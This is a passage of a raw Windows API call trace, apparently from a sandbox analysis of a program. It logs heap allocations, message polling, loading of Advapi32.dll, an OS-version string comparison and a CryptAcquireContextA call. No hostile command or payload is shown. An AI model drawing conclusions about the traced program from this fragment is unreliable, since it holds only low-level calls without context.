HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0226.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.985] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0226.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0226.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0226.986] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0226.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0226.987] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0226.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0226.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.988] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0226.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0226.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.990] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0227.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0227.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0227.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0227.037] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0227.037] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0227.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.037] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0227.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0227.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0227.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0227.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0227.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0227.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0227.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0227.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0227.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.039] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0227.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0227.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0227.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0227.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0227.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0227.040] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0227.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0227.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.043] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0227.044] HeapFree (in: hHeap=0x970000, 